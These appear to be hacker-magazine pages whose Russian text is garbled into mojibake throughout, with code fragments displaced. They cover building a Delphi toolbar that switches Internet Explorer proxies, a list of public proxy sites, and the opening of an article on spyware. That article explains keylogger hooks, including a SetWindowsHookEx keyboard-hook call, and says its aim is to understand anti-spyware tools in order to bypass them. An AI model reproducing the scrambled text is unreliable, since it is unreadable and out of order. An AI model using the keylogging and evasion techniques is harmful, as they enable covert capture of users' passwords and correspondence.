ÂÑÊÀÐÌËÈÂÀÅÌ Internet Explorer — ýòî ñîîðóæåíèå, ñîñòîÿùåå èç íåáîëüøèõ êèðïè÷èêîâ. Áóäü ýòîò êèðïè÷èê òóëáàðîì èëè BHO, îí âñå ðàâíî ñäåëàí èç îäíîãî òîãî æå ìàòåðèàëà è ìàëî ÷åì îòëè÷àåòñÿ

òóëáàðû SnagIt, DM Bar è Google bar

120

Õî÷åøü ðàçîáðàòüñÿ â òåõíîëîãèè COM? Íà÷íè îòñþäà: http://www.rsdn.ru/article/com/introcom.xml.

ìîé íåáîëüøîé ñïèñîê ïðîêñåé

msdn.com — ëó÷øèé äðóã IE-êîäåðà

XÀÊÅÐ 01 /85/ 06


îò ñâîèõ ñîáðàòüåâ. Ïîíèìàåøü, ê ÷åìó ÿ êëîíþ?  IE âñå åäèíîîáðàçíî, è âñå ïëàãèíû ðåàëèçóþòñÿ ñ ïîìîùüþ òåõíîëîãèè COM. Îñíîâîé COM, êàê òû çíàåøü, ÿâëÿåòñÿ èíòåðôåéñ. Èíòåðôåéñ — ýòî ÷èñòî àáñòðàêòíîå ïîíÿòèå.  íåì îáúÿâëåíû âñå ìåòîäû, à ðåàëèçàöèè íåò. Ýòî êàê áû ìàêåò, êîòîðûé ìû äîëæíû âîïëîòèòü â æèçíü. Äóìàþ, ýòî ïîíÿòíî. ×òî æ, äâèãàåìñÿ äàëüøå. Ïðè çàãðóçêå îñåë ñ÷èòûâàåò èç ðååñòðà èíôîðìàöèþ î ñâîèõ ïëàãèíàõ: ãäå íàõîäèòñÿ, êàêîé èìååò òèï è ïðî÷åå. Äàëåå ïîî÷åðåäíî ïîäãðóæàåò DLL êàæäîãî òóëáàðà è âûçûâàåò ýêñïîðòèðóåìóþ ôóíêöèþ DllGetClassObject, ïîëó÷àÿ óêàçàòåëü íà èíòåðôåéñ IClassFactory, îñíîâíàÿ çàäà÷à êîòîðîãî ðåãàòü è àíðåãàòü íàø COM-ñåðâåð. Èç IClassFactory îí âûçûâàåò ôóíêöèþ CreateInstace è ïîëó÷àåò 2 óêàçàòåëÿ íà èíòåðôåéñû IOleCommandTarget è IObjectWithSite. IObjectWithSite, õîòü è èìïëåìåíòèðóåò òîëüêî äâà ìåòîäà SetSite è GetSite, íî ïðè ýòîì èãðàåò çíà÷èòåëüíóþ ðîëü â ñîçäàíèè ïëàãèíà. Ïîñëå ðîæäåíèÿ òóëáàðà óøàñòûé âûçûâàåò ìåòîä SetSite. Ôóíêöèÿ SetSite äîëæíà ïðèñóòñòâîâàòü âî âñåõ ïëàãèíàõ, ïîòîìó ÷òî â íåé ìû äîëæíû ïîëó÷èòü èíòåðôåéñ IWebBrowser2, êîòîðûé ÿâëÿåòñÿ îñíîâíûì ðû÷àãîì áðàóçåðà, IInputObjectSite, ÷åðåç êîòîðûé ìû áóäåì îñóùåñòâëÿòü êîíòðîëü íàä ôîêóñîì ôîðìû, à òàêæå IoleWindow: èç íåãî íóæíî âûçâàòü ôóíêöèþ GetWindow, âîçâðàùàþùóþ íàì õýíäë íàøåé ôîðìû. Ñ ïîìîùüþ QueryInterface ïîëó÷àåì èç punkSite èíòåðôåéñ IInputObjectSite. Àíàëîãè÷íóþ îïåðàöèþ ïðîèçâîäèì ñ èíòåðôåéñîì IOleWindow è ñðàçó æå âûçûâàåì GetWindow è ñîçäàåì ôîðìó. ×òîáû èìåòü èíòåðôåéñ IWebBrowser, íóæíî ïîëó÷èòü èç punkSite èíòåðôåéñ IOleCommandTarget, à ó íåãî èçúÿòü IServiceProvider è âûçâàòü ôóíêöèþ QueryService. Çà÷åì òàêèå ñëîæíîñòè, ïî÷åìó íåëüçÿ QueryInterface? Ïîòîìó ÷òî, åñëè äðóãîé ïëàãèí çàõî÷åò îáðàòèòüñÿ ê íàøåìó òóëáàðó è ïîëó÷èòü åãî èíòåðôåéñ, îí óâèäèò ôèãó. Ðåàëèçàöèþ SetSite ñìîòðè íèæå. ôóíêöèÿ SetSite function TProxyBar.SetSite(const pUnkSite: IUnknown): HResult; var Olewind:IOleWindow; begin if pUnkSite<>nil then begin pUnkSite.QueryInterface(IInputObjectSite,Site); if SUCCEEDED(pUnkSite.QueryInterface(IOleWindow,Olewind)) then begin Olewind.GetWindow(ParentWnd); Olewind._Release;

Åñëè ó òåáÿ âäðóã ÷òî-òî íå ïîëó÷àåòñÿ, èëè òû ïðîñòî õî÷åøü ïðîòîëêíóòü ìíå êàêóþ-íèáóäü îðèãèíàëüíóþ èäåþ, òî ïèøè, íå ñòåñíÿéñÿ.

ß íå ñòàë çàìîðà÷èâàòüñÿ ñ winapi, à èñïîëüçîâàë VCL. Äà, çíàþ ÿ, ÷òî ýòî íå ïî-õàêåðñêè, íî VCL ïðàâèò ìèðîì, Delphi íå ñòàë áû òàêèì ïîïóëÿðíûì áåç íåãî. Åñëè çàõî÷åøü ðåàëèçîâàòü íà ÷èñòîì api, òî òåáå ïðèäåòñÿ èçðÿäíî íàïðÿ÷ü ìîçã, íî ÿ â òåáÿ âåðþ :). Âåðíåìñÿ ê íàøèì èíòåðôåéñàì. Âòîðîé ôóíêöèåé, íàñëåäîâàííîé îò IObjectWithSite, ÿâëÿåòñÿ GetSite, áðàóçåð âñåãäà âûçûâàåò åå ïîñëå SetSite.  íåé ìû äîëæíû âåðíóòü îñëèêó åãî èíòåðôåéñ, êîòîðûé îí íàì äàâàë ïîèãðàòü â ïðîøëîé ôóíêöèè. Ïðîñòî âûçûâàåì Site.QueryInterface è âîçâðàùàåì åìó åãî èíòåðôåéñ, ïóñòü ïîäàâèòñÿ, ñâîëî÷ü! Äàëåå ïî ñïèñêó èäåò IDeskBand. ×òî æ, äåðæèòå ñêàëüïåëü, êîëëåãà, áóäåì âñêðûâàòü :). Åñëè âíà÷àëå òû ðåøèë èçó÷èòü èñõîäíèê, òî óæå óñïåë çàìåòèòü ôóíêöèþ ñ íàçâàíèåì GetBandInfo, çàíèìàþùóþ ãîðàçäî áîëüøóþ ïëîùàäü, ÷åì îñòàëüíûå. Îò íåå áðàóçåð ïîëó÷àåò èíôîðìàöèþ î ðàçëè÷íûõ ïàðàìåòðàõ òóëáàðà, òàêèõ êàê ðàçìåðû, çàãîëîâîê è ò.ä.  êà÷åñòâå ïàðàìåòðîâ áðàóçåð ïåðåäàåò åé ID íàøåé ïàíåëè, ñïîñîá îòîáðàæåíèÿ è ñòðóêòóðó pbdi. Âîò åå-òî ìû è äîëæíû çàïîëíèòü. Ïðè÷åì pdbi.dwMask çàïîëíÿòü íå íóæíî, ýòî èäåíòèôèêàòîð òîãî, ÷òî áðàóçåð æåëàåò îò íàñ óçíàòü. Ìû ïðîâåðÿåì, íå òðåáóåò ëè áðàóçåð â äàííóþ ìèíóòó îò íàñ êàêèõëèáî ïàðàìåòðîâ, è çàïîëíÿåì òîëüêî òå ïóíêòû, êîòîðûå åìó òðåáóþòñÿ. ×òî òàêîå ptMaxSize è ptMinSize ïîéìåò äàæå òþëåíü, à âîò îá îñòàëüíûõ ïàðàìåòðàõ ÿ ðàññêàæó ïîäðîáíåå: dwModeFlags — ïåðåìåííàÿ, êîòîðàÿ îïðåäåëÿåò ïîâåäåíèå íàøåãî òóëáàðà. Âñåãî ìîæíî èñïîëüçîâàòü òðè ýôôåêòà: ïîøàãîâîå èçìåíåíèå ðàçìåðà ïî âåðòèêàëè, ãäå çà øàã îòâå÷àåò ptIntegral, èñïîëüçîâàíèå íåñòàíäàðòíîãî öâåòà è îòîáðàæåíèå, òàê íàçûâàåìûì çàòîïëåííûì ïîÿâëåíèåì (â msdn ìîæåøü âû÷èòàòü íàçâàíèÿ ôëàãîâ). ptActual — ýòî èäåàëüíûé ðàçìåð äëÿ òâîåé ïàíåëè; ïðè âñåõ îáñòîÿòåëüñòâàõ IE ñòàðàåòñÿ äîñòè÷ü èìåííî åãî, è åñëè òóëáàðó íå ìåøàþò òîâàðèùè ïî ñëóæáå, òî îí áóäåò îòìàñøòàáèðîâàí â ñîîòâåòñòâèè ñ ýòèì ïàðàìåòðîì. wszTitle — ýòî caption òóëáàðà. Òàê êàê ýòî íå string, òî íóæíî ïðåîáðàçîâàòü ñòðîêîâîå çíà÷åíèå â òèï WideChar ôóíêöèåé StringToWideChar. StringToWideChar(Caption, @pdbi.wszTitle, Length(Caption) + 1); crBkgnd — öâåò òóëáàðà, îí áóäåò çàäåéñòâîâàí, åñëè òû ïðèñâîèøü dwModeFlags çíà÷åíèå DBIMF_BKCOLOR. Âîò íåáîëüøîé êóñî÷åê èõ ôóíêöèè GetBandInfo, ÷òîáû áûëî ïîíÿòíî, î ÷åì æå èäåò ðå÷ü:

MakeForm(ParentWnd); end;

if (pdbi.dwMask AND DBIM_MINSIZE) <> 0

pUnkSite._Release;

then begin

end;

pdbi.ptMinSize.x := MinXSize;

Result := S_OK; end;

pdbi.ptMinSize.y := MinYSize; end;

«ÂÑÅ ÎÄÈÍÀÊÎÂÛÅ»(C) Òóëáàðû äëÿ IE è òóëáàðû äëÿ îáîëî÷êè, òàêèå êàê ïàíåëü áûñòðî. ãî çàïóñêà, — ýòî îäíî è òî æå, òîëüêî êëþ÷è ðååñòðà ó íèõ ðàçíûå Äëÿ ðåãèñòðàöèè òóëáàðîâ IE èñïîëüçóåòñÿ êëþ÷: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser Äëÿ òóëáàðîâ îáîëî÷êè: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Explorer Äëÿ ðåãèñòðàöèè ïàíåëè ðÿäîì ñ êíîïêîé Start (Ïóñê): HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser.

XÀÊÅÐ 01 /85/ 06

Äàëåå èäóò ôóíêöèè ShowDW è CloseDW. Ïåðâàÿ ïîêàçûâàåò è ñêðûâàåò ôîðìó â çàâèñèìîñòè îò ïåðåìåííîé fshow, à òàêæå âêëþ÷àåò è âûêëþ÷àåò ôîêóñ ñ ïîìîùüþ ôóíêöèè OnFocusChangeIS, èç ñîõðàíåííîãî ðàíåå èíòåðôåéñà áðàóçåðà. Âòîðîé ôóíêöèåé óíè÷òîæàåì îêíî. ResizeBorderDW âûïîëíÿåò êàêèå-òî ñòðàøíûå ìàíèïóëÿöèè ñ ãðàíèöåé ôðåéìà, âûäåëåííîãî ïîä íàøå îêíî, íî ìû íå áóäåì åãî ðåàëèçîâûâàòü è ïèøåì Result:=E_NOTIMPL, ñîîáùàÿ èøàêó, ÷òî ìû íå èìïëåìåíòèðîâàëè ýòó ôóíêöèþ. Îñîáíÿêîì ñðåäè ýòèõ èíòåðôåéñîâ ñòîèò IContextMenu, áåç íåãî òóëáàð áóäåò ðàáîòàòü, è ìîæíî íå ðåàëèçîâûâàòü åãî èìïëåìåíòû, íî ïðè ýòîì òóëáàðèíà ïîòåðÿåò íåêîòîðóþ ôóíêöèîíàëüíîñòü. Êàê âèäíî èç íàçâàíèÿ, IContextMenu — ýòî èíòåðôåéñ, ãäå îïèñàíû ôóíê-

121


ÊÎÄÈÍÃ ///// ISSUE DELPHI

Ïîëíûé èñõîäíûé êîä è âñþ íåîáõîäèìóþ ê íåìó ëàáóäó òû ìîæåøü îáíàðóæèòü íà äèñêå.

öèè äëÿ ðàáîòû ñ êîíòåêñòíûì ìåíþ. ×òî æ, ïîåõàëè ïî ïîðÿäêó.  ôóíêöèè QueryContextMenu ìû äîëæíû âñòàâèòü âñå æåëàåìûå ïóíêòû ìåíþ, à óæå â InvokeCommand îïðåäåëèòü, êàêîå êîëäîâñòâî áóäåò ïðîèñõîäèòü ïðè íàæàòèè íà êàæäûé ïóíêò. Ïîñìîòðè ñîðåö íà äèñêå, òàì âñå ïðîñòî ;). Âîò âðîäå áû è âñå, ÷òî íóæíî äëÿ ñîçäàíèÿ ýëåìåíòàðíîãî òóëáàðà, íî òàê êàê ìû áóäåì èñïîëüçîâàòü êîìïîíåíòû äëÿ ââîäà ñ êëàâèàòóðû (Memo, Edit è òä.), òî íàì íóæíî ðåàëèçîâàòü ôîêóñ, à òî ìû ïðîñòî-íàïðîñòî íå ñìîæåì ïîëó÷èòü â òóëáàðå íèêàêîé èíôû ñ êëàâû. Ìåòîäû äëÿ ðàáîòû ñ ôîêóñîì îáúÿâëåíû â èíòåðôåéñå IInputObject. UIActivateIO, êàê íàïèñàíî â MSDN, ýòà ôóíêöèÿ àêòèâèðóåò/äåàêòèâèðóåò îáúåêò, òî÷íåå îíà ìåíÿåò ôîêóñ â çàâèñèìîñòè îò ïåðåìåííîé fActivate. Ïðîñòî äåëàåì SetFocus, åñëè fActivate — èñòèíà, è íè÷åãî íå äåëàåì, åñëè fActivate — ëîæü. HasFocusIO îïðåäåëÿåò, ñóùåñòâóåò ëè êëàâèøíûé ôîêóñ, è íà îñíîâàíèè îòâåòà äåëàåò âûâîäû. Ðåàëèçóåòñÿ ëåãêî: ïðîñòî âîçâðàùàåì â íåå ôîêóñ ;). TranslateAcceleratorIO — çäåñü íóæíî îòëîâèòü íàæàòèå êëàâèøè <TAB> è ïîñëàòü ôîêóñ â äàëåêîå ïóòåøåñòâèå ïî òóëáàðíûì ïðîñòîðàì. Ïîìèìî âñåãî ïðî÷åãî, íå ñòîèò çàáûâàòü: ÷òîáû COM-ñåðâåð ó íàñ çàðàáîòàë, íàì íóæíî ñîçäàòü åãî GUID. GUID — ýòî òàêîé ID ñåðâåðà, êîòîðûé îáåñïå÷èâàåò åãî óíèêàëüíîñòü âî Âñåëåííîé è âî âñåõ èçìåðåíèÿõ. Äîñòèãàåòñÿ ýòî ñ ïîìîùüþ ìàíèïóëÿöèé ñ äàòîé è âðåìåíåì, à òàêæå ïàðàìåòðàìè æåëåçà.  ñðåäå Delphi ñäåëàíî âñå çà íàñ, è ïî íàæàòèþ <CTRL+SHIFT+G> â ïîçèöèþ êóðñîðà ïîìåùàåòñÿ ñãåíåðèðîâàííûé GUID. Áåç íåãî òåáå íå óäàñòñÿ çàðåãèñòðèðîâàòü òóëáàð. ×òîáû çàðåãèñòðèðîâàòü ëþáîé COM-ñåðâåð, íóæíî ñîçäàòü íåñêîëüêî êëþ÷åé â ðååñòðå. Âîò îíè: HKEY_CLASSES_ROOT\CLSID\[ÃÓÈÄ]\. Çäåñü ïèøåì íàçâàíèå COMñåðâåðà â çíà÷åíèè ïî óìîë÷àíèþ.  íàøåì ñëó÷àå — ProxyBar. HKEY_CLASSES_ROOT\CLSID\[ÃÓÈÄ]\InProcServer32. Íå áóäåì çàöèêëèâàòüñÿ íà ïîòî÷íîé ìîäåëè COM, è â êëþ÷ ThreadingModel çàïèøåì Apartment. Åñëè òåáÿ èíòåðåñóåò, ÷òî ýòî çà çâåðü, òî ëèòåðàòóðû ïî COM ñóùåñòâóåò îãðîìíîå êîëè÷åñòâî, è, äóìàþ, ñ ïîèñêîì ïðîáëåì âîçíèêíóòü íå äîëæíî. HKEY_CLASSES_ROOT\CLSID\[ÃÓÈÄ]\Implemented Categories\[Òèï òóëáàðà].  ýòîì êëþ÷å ïèñàòü íè÷åãî íå íàäî, åãî íóæíî ïðîñòî ñîçäàòü. Îí áóäåò äàâàòü õàðàêòåðèñòèêó íàøå��ó COM-ñåðâåðó.  íàøåì ñëó÷àå òèï òóëáàðà — ýòî DeskBand, à åãî GUID ðàâåí {00021492-00000000-C000-000000000046}, ÷òî î÷åíü ëåãêî çàïîìíèòü :). È êóëüìèíàöèîííûì ìîìåíòîì ðåãèñòðàöèè ÿâëÿåòñÿ îáúÿâëåíèå íàøåãî COM-ñåðâåðà êàê òóëáàðà.  HKEY_CURRENT_USER\Software\Microsoft\ Internet Explorer\Toolbar\WebBrowser ñîçäàåì ïóñòîé êëþ÷ [ÃÓÈÄ] è íà÷èíàåì ðàñïå÷àòûâàòü ñëåäóþùóþ áóòûëêó ñîêà. Íî ÷òî äåëàòü ñ ýòèìè [ÃÓÈÄ]? Êàê æå îòêðûâàòü êëþ÷è ðååñòðà, îíè âåäü string, à ýòî TGUID? À ëåãêî! Ñóùåñòâóåò òàêàÿ ôóíêöèÿ, êàê GuidToString. Âîò è èñïîëüçóé åå ïî íàçíà÷åíèþ. Íå çàáûâ ñäåëàòü â ïðîöåäóðå àíðåãà óäàëåíèå ðàíåå ñîçäàííûõ êëþ÷åé, ìîæíî ñ÷èòàòü, ÷òî çâåðþãà ãîòîâà. È ÷òî ìîæíî íà÷èíàòü ó÷èòü åå æèçíè ;).

ÏÐÎÊÑÈ Äîáûâàòü ïðîêñè ìîæíî ðàçíûìè ïóòÿìè. Êòî-òî ñêàíèðóåò äèàïàçîíû íà îòêðûòûå ïîðòû 80, 3128, 8080, êòî-òî ïîêóïàåò äîñòóï ê áîëüøîìó è óäîáíîìó ëèñòó, êòî-òî ñ ãîðÿùèìè ãëàçàìè áåãàåò ïî ôîðóìàì, ãäå ìîãóò âûëîæèòü ïàðî÷êó àäðåñîâ (âðîäå asechka.ru). ß ïî ýòîìó ïîâîäó íå î÷åíü íàïðÿãàþñü, ïðîñòî ïîòðîøó ðåñóðñû ñ ïàáëèê-ïðîêñÿìè, ÷åêàþ èõ, ïîñëå ÷åãî î÷èùàþ ïîëó÷åííûé ëèñò îò ñåðâåðîâ íàøèõ òîâàðèùåé èç FBI è US Army ;). Ïóáëè÷íûå ëèñòû ïðîêñè-ñåðâåðîâ èùè ïî ñëåäóþùèì

122

ÎÁÚÅÇÆÀÅÌ Ôîðìà ãîòîâà, íî îíà ïóñòà è ïðîêó îò íåå íå áîëüøå, ÷åì îò áåçàëêîãîëüíîãî ñîêà. Ïðèäåòñÿ èñïðàâëÿòü. Íà ôîðìå ó íàñ ðàñïîëîæèòñÿ ComboBox è êíîïêà.  ComboBox'å áóäåò íàõîäèòüñÿ ñàì ïðîêñè ëèñò, à êíîïêîé ìû áóäåì ìåíÿòü ïðîêñè íà âûáðàííûé íàìè âàðèàíò. ×òîáû ïðèöåïèòü ïðîêñèê ê IE îñîáîãî òðóäà íå òðåáóåòñÿ, âñåãî-íàâñåãî íóæíî ìåíÿòü çíà÷åíèå êëþ÷à HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Internet Settings\ProxyServer íà çíà÷åíèå âèäà proxy:port, à òàêæå èçìåíèòü ñòîÿùèé ðÿäîì êëþ÷ ProxyEnable íà 1, è äåëî â øëÿïå. Ñ ýòèì ïðîáëåì âîçíèêíóòü íå äîëæíî. Òàê êàê â ComboBox'å áóäóò õðàíèòüñÿ âñå ïðîêñèêè, òî ìû äîëæíû ñîõðàíÿòü ýòîò ëèñò è çàãðóæàòü ïðè ñîçäàíèè òóëáàðà.  ñîáûòèè FormCreate ïðîïèñûâàåøü Combobox1.Items.LoadFromFile('C:\Proxy.txt'), è ïðîêñè îêàçûâàþòñÿ â ëèñòå, à ñîõðàíÿòü èõ íàäî â ñîáûòèè FormDestroy Combobox1.Items.SaveToFile. Âîò è âñå, ÷åéíäæåð ïðîêñè çàêîí÷åí. Òåïåðü ó òåáÿ åñòü dll'êà, íî ïðåæäå ÷åì ðàäîâàòüñÿ æèçíè è äîïèâàòü ñëàáîàëêîãîëüíûå íàïèòêè, ìèðíî ñòîÿùèå ó òåáÿ íà ñòîëå, ñòîèò åå çàðåãèñòðèðîâàòü. Äåëàåòñÿ ýòî ñ ïîìîùüþ ñòàíäàðòíîé âèíäîâîé óòèëèòû regsvr32. âîò òàê ïîäãðóæàåì íàøó ïàíåëü regsvr32 C:\proxybar.dll

à òàê âûãðóæàåì regsvr32 -u C:\proxybar.dll

Òàê êàê ðåãèñòðàöèÿ ïðîõîäèò ÷åðåç ìåòîä UpdateRegistry, òî ìîæíî âñòàâèòü òóäà ÷òî-íèáóäü âðîäå ShowMessage('Ñïàñèáî òåáå çà ðåãèñòðàöèþ') èëè ñðàçó ðåäèðåêòèòü íà ñòðàíèöó ðàçðàáîò÷èêà. Êñòàòè, î ïòè÷êàõ. ×òîáû ïîëó÷èòü êîíòðîëü íàä áðàóçåðîì, áóäü òî ðåäèðåêò èëè ïîëó÷åíèå êîíòåíòà ñòðàíè÷êè, òåáå ïîòðåáóåòñÿ ðàçîáðàòüñÿ ñ èíòåðôåéñîì IWebBrowser2. Äóìàþ, ÷òî òû óæå ñòàëêèâàëñÿ ñ êîìïîíåíòîì TwebBrowser. Âñå ôóíêöèè, êîòîðûå â íåì åñòü, çàèìñòâîâàíû êàê ðàç èç IWebBrowser2. Òû ìîæåøü þçàòü ôóíêöèè Navigate, Stop, Refresh è áûòü ñ÷àñòëèâûì, íî ïîìíè, ÷òî íåëüçÿ äåëàòü òàê: IE.Navigate(Url, 0, 0, 0, 0); íóæíî îáÿçàòåëüíî îáúÿâèòü ïåðåìåííóþ òèïà OleVariant è ïðèñâîèòü åé çíà÷åíèå: IE.Navigate(Url, X, X, X, X); Íèêàêèõ íóëåé! «ÒÅÏÅÐÜ ÌÍÅ ÑÓÕÎ È ÊÎÌÔÎÐÒÍλ(C)  ðåçóëüòàòå ìû ñ òîáîé ñîòâîðèëè îòëè÷íûé òóëáàð, ïî÷òè íå íàïðÿãàÿñü. Óâåðåí, ÷òî òû óæå ãîðèøü æåëàíèåì êàê-íèáóäü åãî äîðàáîòàòü, äîáàâèòü ìèíè proxy-÷åêåð, ïðîâåðêó íà âðåìÿ îòêëèêà è ïðî÷èå íóæíûå âåùè. Íî îäíîé ñìåíîé proxy-ñåðâåðîâ ðàçðàáîòêà òóëáàðîâ äëÿ IE, êàê òû ïîíèìàåøü, íå îãðàíè÷èâàåòñÿ!  IE ìîæíî ëåãêî ìåíÿòü àáñîëþòíî ëþáûå íàñòðîéêè, áëàãî õðàíÿòñÿ îíè â ðååñòðå. Ìîæíî, íàïðèìåð, ñîçäàòü Security Explorer Bar, ãäå îäíèì êëèêîì ìîæíî áóäåò èçìåíèòü ïàðàìåòðû ïðèåìà êóêèñîâ èëè î÷èùàòü õèñòîðè. Âñå, ÷òî òåáå íóæíî, — msdn, ýòà ñêðîìíàÿ ñòàòüÿ è, êîíå÷íî æå, íåìíîãî âîîáðàæåíèÿ. Íàäåþñü, ÿ òåáÿ çàèíòåðåñîâàë. BINARY YOUR’S z

àäðåñàì: http://www.samair.ru/proxy/ http://proxy.mazafaka.ru/ http://nntime.com/proxy/ http://proxy.asechka.ru/index.php?page=proxylist Îíëàéíîâûé proxy-÷åêåð: http://proxy.asechka.ru/index.php?page=proxychecker Îíëàéíîâûé proxy-ôèëüòð: http://proxy.asechka.ru/index.php?page=proxyfilter

XÀÊÅÐ 01 /85/ 06


ÊÎÄÈÍÃ ÊÎÄÈÍÃ ///// ISSUE Ñ/Ñ++

TEXT MS-REM / MS-REM@YANDEX.RU /

ÝÍÖÈÊËÎÏÅÄÈß SPYWARE ÊÀÊ È ×ÒÎ ÂÎÐÓÞÒ ÑÎÂÐÅÌÅÍÍÛÅ ØÏÈÎÍÑÊÈÅ ÏÐÎÃÐÀÌÌÛ

ÑÅÃÎÄÍß ÂÑÅ ÏÎÂÀÄÈËÈÑÜ ÄÐÓà ÇÀ ÄÐÓÃÎÌ ØÏÈÎÍÈÒÜ. ÍÈ×ÅÃÎ, ÍÀÄÎ ÇÀÌÅÒÈÒÜ,  ÝÒÎÌ ÕÎÐÎØÅÃÎ ÍÅÒ. ÍÀÏËÎÄÈËÀÑÜ ÖÅËÀß ÊÓ×À ÏÐÎÃÐÀÌÌ, ÖÅËÜ Ó ÊÎÒÎÐÛÕ ÎÄÍÀ — ÑÎÁÈÐÀÒÜ ÂÑßÊÓÞ ÈÍÔÎÐÌÀÖÈÞ Ñ ÊÎÌÏÜÞÒÅÐÀ È ÎÒÏÐÀÂËßÒÜ ÅÅ ÊÎÌÓ-ÍÈÁÓÄÜ ÂÎ ÂÍÅ. ÊËÀÑÑ ÝÒÈÕ ÏÐÎÃÐÀÌÌ ÎÊÐÅÑÒÈËÈ ÇÀÌÅ×ÀÒÅËÜÍÛÌ ÑËÎÂÎÌ SPYWARE.  ÝÒÎÌ, ÊÑÒÀÒÈ, ÒÎÆÅ ÍÈ×ÅÃÎ ÕÎÐÎØÅÃÎ. ÕÎÐÎØÎ ÒÎËÜÊÎ ÒÎ, ×ÒÎ ÑÅÃÎÄÍß ÌÛ ÐÀÇÁÅÐÅÌÑß, ÊÀÊÈÌÈ ÁÛÂÀÞÒ ÝÒÈ ÍÅÏÐÈßÒÍÛÅ ØÏÈÎÍÑÊÈÅ ÈÍÑÒÐÓÌÅÍÒÛ, ÊÀÊ ÎÍÈ ÐÅÀËÈÇÓÞÒÑß È ÊÀÊ ÎÒ ÍÈÕ ÓÁÅÐÅ×ÜÑß

Äàâàé äàäèì ñòðîãîå îïðåäåëåíèå spyware. Spyware — ýòî ïðîãðàììà, áåç ðàçðåøåíèÿ ïîëüçîâàòåëÿ ñîáèðàþùàÿ êàêóþ-ëèáî èíôîðìàöèþ î êîìïüþòåðå è îòïðàâëÿþùàÿ åå ñâîåìó õîçÿèíó.  êàòåãîðèþ spyware îäíîçíà÷íî ìîæíî çàïèñàòü ðàçíîîáðàçíûå êåéëîããåðû, ôîðìãðàááåðû è ïàðîëüíûå òðîÿíû íàïîäîáèå Pinch. Íî ïðîèçâîäèòåëè AntiSpywareñîôòà íå ïðèäåðæèâàþòñÿ ñòîëü ñòðîãîãî îïðåäåëåíèÿ è äîáàâëÿþò â ñâîè áàçû ñèãíàòóð ïðîãðàììû ñîâñåì íå ïîäõîäÿùèå ïîä ýòî îïðåäåëåíèå (ê ïðèìåðó, òðîÿíû âðîäå NetBus, êîòîðûå íèêàêèõ øïèîíñêèõ ôóíêöèé â ïîìèíå íå èìåþò). Íà ýòîì ïðèíöèïå ðàáîòàþò AntiSpyware ìîäóëè ZoneAlarm è Outpost Firewall (â íåì òàêîé ìîäóëü ïîÿâèëñÿ ñîâñåì íåäàâíî, ñ âûõîäîì âåðñèè 3.0), à òàêæå ïðîãðàììû AVZ, TrojanRemover, Microsoft AntiSpyware è ìíîãèå äðóãèå. Ïîëüçà îò ïîäîáíûõ çàùèò âåñüìà ñîìíèòåëüíà. Îíè ðàáîòàþò àíàëîãè÷íî àíòèâèðóñó, à çíà÷èò, íå óìåþò ðàñïîçíàâàòü íîâûå øïèîíñêèå ïðîãðàììû è ìîäèôèöèðîâàííûå âåðñèè ñòàðûõ. Ê òîìó æå ëþáîé àíòèâèðóñ ñïðàâëÿåòñÿ ñ ñèãíàòóðíûì ïîèñêîì ãîðàçäî ëó÷øå òàêèõ ïðîãðàìì. Íî ñóùåñòâóþò AntiSpyware-óòèëèòû, îñíîâàííûå íå íà ïîèñêå êîíêðåòíûõ øïèîíñêèõ ïðîãðàìì, à íà îïðåäåëåíèè õàðàêòåðíûõ ïðèçíàêîâ èõ ðàáîòû. Òàêèå ïðîãðàììêè îáåñïå÷èâàþò íåïëîõîé óðîâåíü çàùèòû, è äëÿ èõ îáõîäà íóæíî ÷åòêî ïðåäñòàâëÿòü ìåòîäû èõ ðàáîòû.  êîíöå ñòàòüè ÿ ïîäðîáíî ðàññìîòðþ íåñêîëüêî òàêèõ ïðîãðàìì, à ïîêà äàâàé ðàçáåðåìñÿ, çà êàêèìè èìåííî äàííûìè îõîòÿòñÿ çëûå è íåõîðîøèå øïèîíû.

124

ÊÅÉËÎÃÃÅÐÛ Êåéëîããåðû aka êëàâèàòóðíûå øïèîíû — ýòî ñàìûé ðàñïðîñòðàíåííûé òèï øïèîíñêèõ ïðîãðàìì. Îí ïîÿâèëñÿ åùå âî âðåìåíà ñòàðîãî äîáðîãî DOS'à, è òåïåðü ðåàëèçàöèè êåéëîããåðîâ ìîæíî âñòðåòèòü ïîä òàêèìè ñèñòåìàìè, êàê Windows âñåõ ìàñòåé, Linux è äàæå BSD. Êàê òû, êîíå÷íî, ïîíèìàåøü, ýòè øïèîíñêèå ïðîãðàììû çàíèìàþòñÿ òåì, ÷òî òèõîíüêî çàïèñûâàþò âñå ââåäåííîå ñ êëàâèàòóðû. Ýòî ìîãóò áûòü ïàðîëè, ìîæåò áûòü ïåðåïèñêà, òàê ÷òî îõâàò ó ýòîãî òèïà spyware ïðèëè÷íûé. Íèêòî â îáèäå íå îñòàíåòñÿ, â òîì ÷èñëå è êîäåðû.  Windows áîëüøèíñòâî êëàâèàòóðíûõ øïèîíîâ ïðåäñòàâëÿþò ñîáîé íåñëîæíûé õóê íà îäíî èç ñèñòåìíûõ ñîáûòèé. Äëÿ óñòàíîâêè òàêîãî õóêà èñïîëüçóåòñÿ ôóíêöèÿ SetWindows HookEx. Äëÿ çàõâàòà íàæàòèé êëàâèø ëîâóøêà ñòàâèòñÿ íà ñîáûòèÿ WH_GETMESSAGE èëè WH_KEYBOARD.  ïåðâîì ñëó÷àå callback-ôóíêöèÿ õóêà áóäåò ïîëó÷àòü âñå îêîííûå ñîîáùåíèÿ, à âî âòîðîì — òîëüêî WM_KEYDOWN è WM_KEYUP. Ïðîöåäóðà, îáðàáàòûâàþùàÿ õóêè, äîëæíà íàõîäèòüñÿ â dll, êîòîðàÿ áóäåò ïîäãðóæåíà êî âñåì ïðîöåññàì, èìåþùèì î÷åðåäü ñîîáùåíèé (ýòî âñå GUI-ïðîöåññû). Çàòåì îêîííîå ñîîáùåíèå ïåðåäàåòñÿ â îñíîâíîé ïðîöåññ êåéëîããåðà ñ ïîìîùüþ SendMessage, ãäå è ïðîèñõîäèò ñîõðàíåíèå ëîãà íà äèñê èëè îòïðàâêà åãî â ñåòü. Óñòàíîâêà õóêà áóäåò âûãëÿäåòü òàê: hHook = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, hInstance, 0);

